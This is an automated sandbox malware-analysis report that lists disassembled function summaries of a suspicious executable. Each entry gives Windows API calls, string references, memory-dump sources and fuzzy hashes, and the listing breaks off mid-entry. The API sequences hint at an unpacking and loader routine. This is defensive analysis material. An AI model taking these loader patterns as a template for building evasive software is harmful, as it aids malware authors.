                                                                                                                                              • Opcode ID: 7580fc86ef3703e129c93f81ffe4cb78bab1cb0c9785aa81ad774adae03db122
                                                                                                                                              • Instruction ID: 4de3da79c62a0b75e44d7bd2c56d04160538a993b3b658ad46e0b3fd54b52aaf
                                                                                                                                              • Opcode Fuzzy Hash: 7580fc86ef3703e129c93f81ffe4cb78bab1cb0c9785aa81ad774adae03db122
                                                                                                                                              • Instruction Fuzzy Hash: 8D417D71D00B14CADB20AB76A8466EE37B1AF85714F24443FE5589A291DB3C89C2CB9D
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • SysAllocStringLen.OLEAUT32(?,?), ref: 025D9413
                                                                                                                                              • SysStringLen.OLEAUT32(00000000), ref: 025D9420
                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 025D9439
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,02581C5A), ref: 025D9450
                                                                                                                                              Strings
                                                                                                                                              • called `Result::unwrap()` on an `Err` value, xrefs: 025D9487
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: String$Free$AllocHeap
                                                                                                                                              • String ID: called `Result::unwrap()` on an `Err` value
                                                                                                                                              • API String ID: 1317130057-2333694755
                                                                                                                                              • Opcode ID: 8ebc5e2f3cdc024c124c70e883f3b57dc24d5a551b9094c4bc98e45e1cb7744c
                                                                                                                                              • Instruction ID: 538e1765b37d891f2f553aadb64fa103fec5423cfdc0326530772e693b6d2a30
                                                                                                                                              • Opcode Fuzzy Hash: 8ebc5e2f3cdc024c124c70e883f3b57dc24d5a551b9094c4bc98e45e1cb7744c
                                                                                                                                              • Instruction Fuzzy Hash: E8712A73E046555BD3288E5DC89027ABBD2BBC4354F0A893DE89ECB381DA70DC05C799
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • TlsGetValue.KERNEL32(00000000), ref: 025D04E9
                                                                                                                                              • TlsGetValue.KERNEL32(00000000), ref: 025D0510
                                                                                                                                              • TlsSetValue.KERNEL32(00000000,00000000), ref: 025D055E
                                                                                                                                              • BCryptGenRandom.BCRYPT(00000000,?,00000010,00000002), ref: 025D0574
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Value$CryptRandom
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 658332386-0
                                                                                                                                              • Opcode ID: 3dc47e2773e6529d64e042b24fb5dda9b56c6546fd4cce04747590574309cbec
                                                                                                                                              • Instruction ID: 19ce33ab647d17b548b14a7187c942de8c705182e30376e72912b9ef476c06c6
                                                                                                                                              • Opcode Fuzzy Hash: 3dc47e2773e6529d64e042b24fb5dda9b56c6546fd4cce04747590574309cbec
                                                                                                                                              • Instruction Fuzzy Hash: 0121CD70A006448FE7309F2D9809B6A7BE8FF04709F058918ED48DB290E731EC94CBA8
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,025EFBF2,?,?,025BAA2A,?,?,?,?,025BA70C,?,?,?,0257161A,025DD2B0), ref: 025CD43F
                                                                                                                                              • RtlAllocateHeap.NTDLL(00550000,00000000,00000014,00000000,?,025EFBF2,?,?,025BAA2A,?,?,?,?,025BA70C,?,?), ref: 025CD451
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Heap$AllocateProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1357844191-0
                                                                                                                                              • Opcode ID: db68e3975aa20c30635d5e3bb7248bf83c1601afedf64feabd2d0e1cc0c66555
                                                                                                                                              • Instruction ID: 9ac9bae91a537a76402f0eb1b9685ebffcc1c9ee1d65aba493d50f71c5cd4eec
                                                                                                                                              • Opcode Fuzzy Hash: db68e3975aa20c30635d5e3bb7248bf83c1601afedf64feabd2d0e1cc0c66555
                                                                                                                                              • Instruction Fuzzy Hash: CCD02B70B015015F47748EB9BC88C572EBCFBC52A23110839AA04C3100F7B0D490C3B8
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              • cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs, xrefs: 025D1B26
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Value$CryptRandom
                                                                                                                                              • String ID: cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs
                                                                                                                                              • API String ID: 658332386-682668089
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,000C4E00,00003000,00000004), ref: 0042C6C3
                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,?,0000001B), ref: 0042C73A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                              • String ID: 6$9+Di$Gs$M4U5$O$pfx8$s<O?(Su(
                                                                                                                                              • API String ID: 4275171209-2690861754
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • EnterCriticalSection.KERNEL32(0044AEF4,?,?,?,0044AED8,0044AED8,0042BB1F,?,?,?,0042B380,00429E06,0040C70D), ref: 0042B65A
                                                                                                                                              • GlobalAlloc.KERNELBASE(00000002,00000000,00000000,?,?,?,0044AED8,0044AED8,0042BB1F,?,?,?,0042B380,00429E06,0040C70D), ref: 0042B6AC
                                                                                                                                              • GlobalHandle.KERNEL32(00563488), ref: 0042B6B5
                                                                                                                                              • GlobalUnlock.KERNEL32(00000000,?,?,?,0044AED8,0044AED8,0042BB1F,?,?,?,0042B380,00429E06,0040C70D), ref: 0042B6BE
                                                                                                                                              • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 0042B6D0
                                                                                                                                              • GlobalHandle.KERNEL32(00563488), ref: 0042B6EC
                                                                                                                                              • GlobalLock.KERNEL32(00000000,?,?,?,0044AED8,0044AED8,0042BB1F,?,?,?,0042B380,00429E06,0040C70D), ref: 0042B6F3
                                                                                                                                              • LeaveCriticalSection.KERNEL32(00429E06,?,?,?,0044AED8,0044AED8,0042BB1F,?,?,?,0042B380,00429E06,0040C70D), ref: 0042B6F9
                                                                                                                                              • GlobalLock.KERNEL32(0040C70D,?,?,?,0044AED8,0044AED8,0042BB1F,?,?,?,0042B380,00429E06,0040C70D), ref: 0042B708
                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0042B74A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2667261700-0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • SetThreadStackGuarantee.KERNELBASE(?), ref: 025CCCF8
                                                                                                                                              • GetLastError.KERNEL32 ref: 025CCD02
                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000), ref: 025CCD4C
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025CCD5D
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025CCDFD
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025CCE0E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$ErrorGuaranteeLastStackThread
                                                                                                                                              • String ID: Invalid
                                                                                                                                              • API String ID: 3680998240-874791708
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(0000000B), ref: 00426EC5
                                                                                                                                              • GetSystemMetrics.USER32(0000000C), ref: 00426ECC
                                                                                                                                              • GetSystemMetrics.USER32(00000002), ref: 00426ED3
                                                                                                                                              • GetSystemMetrics.USER32(00000003), ref: 00426EDD
                                                                                                                                              • GetDC.USER32(00000000), ref: 00426EE7
                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00426EF8
                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00426F00
                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00426F08
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1031845853-0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,1875003F), ref: 025818E4
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02581972
                                                                                                                                              • CopyFileExW.KERNELBASE(?,?,025D0350,00000000,00000000,00000000), ref: 02581994
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025819C0
                                                                                                                                              • GetLastError.KERNEL32 ref: 025819D6
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02581A00
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CopyErrorFileLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 492081815-0
                                                                                                                                              • Opcode ID: 1438b05f28117d9f75d6dcba2ec398f0a38173480ed7ef601973434d1e5b8115
                                                                                                                                              • Instruction ID: 5f48cb45767b7b1bdc0bbbe7a630f5b1c19ee80415af67046125e967d85d3563
                                                                                                                                              • Opcode Fuzzy Hash: 1438b05f28117d9f75d6dcba2ec398f0a38173480ed7ef601973434d1e5b8115
                                                                                                                                              • Instruction Fuzzy Hash: FC51FFB5600B009FD324CF15C984B62BBF6BB48314F14CA6DD89A8BB91D771A885CF94
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseHandleTimerWaitable$CreateObjectSingleSleepWait
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2261246915-0
                                                                                                                                              • Opcode ID: b71517d2d12b4c1f416029f7367b8b9cada5edf90a6f91c740849bab3563fc43
                                                                                                                                              • Instruction ID: d617cb64646db3a0c9a7aefd691ba625d6e8b3f39b026d3d77bf61dfc31b2835
                                                                                                                                              • Opcode Fuzzy Hash: b71517d2d12b4c1f416029f7367b8b9cada5edf90a6f91c740849bab3563fc43
                                                                                                                                              • Instruction Fuzzy Hash: E841D771A047014FC704DF7C894426EBEE5AB88254F55CB3CE898C7391FA30C554CB8A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,000C4E00,00003000,00000004), ref: 0042C6C3
                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,?,0000001B), ref: 0042C73A
                                                                                                                                              • LoadLibraryA.KERNELBASE(?), ref: 0042C8B1
                                                                                                                                              • GetProcAddress.KERNELBASE(?,-00000002), ref: 0042C8E1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocVirtual$AddressLibraryLoadProc
                                                                                                                                              • String ID: s<O?(Su(
                                                                                                                                              • API String ID: 2938105391-2579506083
                                                                                                                                              • Opcode ID: b3fac43b6f37ce7f2159d76fdb1eea15d15c32a495f9fe60442fcf7cf701a851
                                                                                                                                              • Instruction ID: 98f8efe1d1dce6292f322ff0c0b8de9db3192ba101f6e8a77763a19099652570
                                                                                                                                              • Opcode Fuzzy Hash: b3fac43b6f37ce7f2159d76fdb1eea15d15c32a495f9fe60442fcf7cf701a851
                                                                                                                                              • Instruction Fuzzy Hash: 39A12471E012299FCB14CFA8D980BADBBF1BF49305F6881AAD845EB341D778A941CB54
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: VUUU
                                                                                                                                              • API String ID: 0-2040033107
                                                                                                                                              • Opcode ID: 2b3582ded2f59462f7dfd74485a4df2a3a2b4d111fa04d78d3bbe2aa65126484
                                                                                                                                              • Instruction ID: ea19256d3f95c5b865720783486d2e9e279fea0334f6943954ef772bc8db16c1
                                                                                                                                              • Opcode Fuzzy Hash: 2b3582ded2f59462f7dfd74485a4df2a3a2b4d111fa04d78d3bbe2aa65126484
                                                                                                                                              • Instruction Fuzzy Hash: 4F512872A042024FD72A8F29C8423EABBD6BFC5254F59853DD989CB291F731DC06C789
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 02581C96
                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 02581CA1
                                                                                                                                                • Part of subcall function 02581BFE: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,02581E0B), ref: 02581C2B
                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 02581CC2
                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 02581CCD
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Free$String$Heap
                                                                                                                                              • String ID: WQL
                                                                                                                                              • API String ID: 4134718113-1249411209
                                                                                                                                              • Opcode ID: 387e91a87de461f81f88d0d5442a858492e3e640890d82b1b08078475b4ac16f
                                                                                                                                              • Instruction ID: b508ced69dfa96ce82dbcb0b63266e89f778b224e724a57ccff6e3ff15085e79
                                                                                                                                              • Opcode Fuzzy Hash: 387e91a87de461f81f88d0d5442a858492e3e640890d82b1b08078475b4ac16f
                                                                                                                                              • Instruction Fuzzy Hash: 9D51AE719087419BD710EF24C44066BBBE5FFC9314F14CA1DF98AA7251E7B0EA86CB86
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetStartupInfoA.KERNEL32(?), ref: 0041AF29
                                                                                                                                              • GetFileType.KERNEL32(?), ref: 0041AFD3
                                                                                                                                              • GetStdHandle.KERNEL32(-000000F6), ref: 0041B054
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileHandleInfoStartupType
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2461013171-0
                                                                                                                                              • Opcode ID: 2d49ff2e1dac1d461a9ba017d4f7fce9fd659b37ad6f8575f489bd24d7f4b863
                                                                                                                                              • Instruction ID: cad9638fdaf26c8eb5ebf78c6630cc0ebb1e4dd1610fc6893beeae660980b453
                                                                                                                                              • Opcode Fuzzy Hash: 2d49ff2e1dac1d461a9ba017d4f7fce9fd659b37ad6f8575f489bd24d7f4b863
                                                                                                                                              • Instruction Fuzzy Hash: AE51E4712057418FC720CF28C8847A77BE0EB15324F298A7EE5A6C72E1D738D89AC759
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257EAD1
                                                                                                                                              • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 0257EAE4
                                                                                                                                              • GetLastError.KERNEL32 ref: 0257EAEF
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257EB4D
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257EB66
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$ErrorExecuteLastShell
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1794832005-0
                                                                                                                                              • Opcode ID: 942958ca736297a33add4700d822dde069954ec2edf6c2fa64bb55052fb4406a
                                                                                                                                              • Instruction ID: 7426dce7dbe5027bf7af736376174650d2f3a051616072376a2a87d56addddb9
                                                                                                                                              • Opcode Fuzzy Hash: 942958ca736297a33add4700d822dde069954ec2edf6c2fa64bb55052fb4406a
                                                                                                                                              • Instruction Fuzzy Hash: C1316FB0500301AFD720DF14D808B5ABBEAFF84314F14895CF94987291D771989ACF99
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,?,0000001B), ref: 0042C73A
                                                                                                                                              • LoadLibraryA.KERNELBASE(?), ref: 0042C8B1
                                                                                                                                              • GetProcAddress.KERNELBASE(?,-00000002), ref: 0042C8E1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressAllocLibraryLoadProcVirtual
                                                                                                                                              • String ID: s<O?(Su(
                                                                                                                                              • API String ID: 4074058790-2579506083
                                                                                                                                              • Opcode ID: f2fd0d41c120b0acc762afd2b1f5d72efe51c0065ea40216067eb6c2da04019b
                                                                                                                                              • Instruction ID: 4dfecaa40277070d29589cf71415a5a9c46b68c125777a1cbeafcd6e7af7fa96
                                                                                                                                              • Opcode Fuzzy Hash: f2fd0d41c120b0acc762afd2b1f5d72efe51c0065ea40216067eb6c2da04019b
                                                                                                                                              • Instruction Fuzzy Hash: 63912471E01229DFCB24CFA8D980BADBBF1BF49305F6881AAD845EB341D734A941CB54
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • CoCreateInstance.OLE32(026137A4,00000000,00000001,02613788,?,?,0259AA3A,0000000A), ref: 025D9781
                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 025D97EC
                                                                                                                                              • CoSetProxyBlanket.OLE32 ref: 025D981A
                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 025D9865
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeString$BlanketCreateInstanceProxy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 459372342-0
                                                                                                                                              • Opcode ID: 7a65e0bbd0b2a56aaadfea8427cd89b2b59626a12e39972bba5accdecd4cccc1
                                                                                                                                              • Instruction ID: ef27bc3b076f12c38d2072476d5a8b8a1c463265cfc37a660c2816b0cae54cc0
                                                                                                                                              • Opcode Fuzzy Hash: 7a65e0bbd0b2a56aaadfea8427cd89b2b59626a12e39972bba5accdecd4cccc1
                                                                                                                                              • Instruction Fuzzy Hash: FC4161B0A443429FD3209F6DC48862AFBF5BFC4714F14892DE98ACB210EB70D885CB15
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000), ref: 025C9935
                                                                                                                                              • GetLastError.KERNEL32 ref: 025C9948
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025C9961
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateDirectoryErrorFreeHeapLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2326324456-0
                                                                                                                                              • Opcode ID: f9e1e2c2968e5fa683c2755f85cffd20bab0226ea8257ebe05a166709b0411e4
                                                                                                                                              • Instruction ID: ca7384d6450fdddaf11a85f6d74eb8f035c6e6fe850d73de98f3b63f8dec2d88
                                                                                                                                              • Opcode Fuzzy Hash: f9e1e2c2968e5fa683c2755f85cffd20bab0226ea8257ebe05a166709b0411e4
                                                                                                                                              • Instruction Fuzzy Hash: 78115EB15083429FD7289F55D88472BBBE5FF95710F20482DE9C587650E730D844DB9A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 025BEE8A
                                                                                                                                              • SetThreadDescription.KERNELBASE(00000000,?,?,?,?,?,?,?,?,0256EB3C), ref: 025BEE98
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,0256EB3C), ref: 025BEEA7
                                                                                                                                                • Part of subcall function 025C16E0: HeapFree.KERNEL32(00000000,?), ref: 025C1778
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeapThread$CurrentDescription
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2762239883-0
                                                                                                                                              • Opcode ID: fb5b8077efae5d8092707a36ae87be8c753d358fcadcb11241f7a4fcff2b0ed0
                                                                                                                                              • Instruction ID: f41cc710990123eb65c5190dcdc217d6f3d77a412b0dd0ace4a9f3afee25d88b
                                                                                                                                              • Opcode Fuzzy Hash: fb5b8077efae5d8092707a36ae87be8c753d358fcadcb11241f7a4fcff2b0ed0
                                                                                                                                              • Instruction Fuzzy Hash: 25F0A475A041029FC714AA54EC09BAF7776BFC0314F548D2CE84987144E7309894CB8A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 025E662E
                                                                                                                                              • GetFileType.KERNELBASE(00000000), ref: 025E6640
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileHandleType
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3000768030-0
                                                                                                                                              • Opcode ID: 3a8d265d7436f248c25574c8b28e521f8651df04f5fc998e26b8b347e887a28f
                                                                                                                                              • Instruction ID: 5ce1bfe6d547c452b3ab5e2ff3fcb50a8eb1a21e7b3e4373bf3f835e90b0b20d
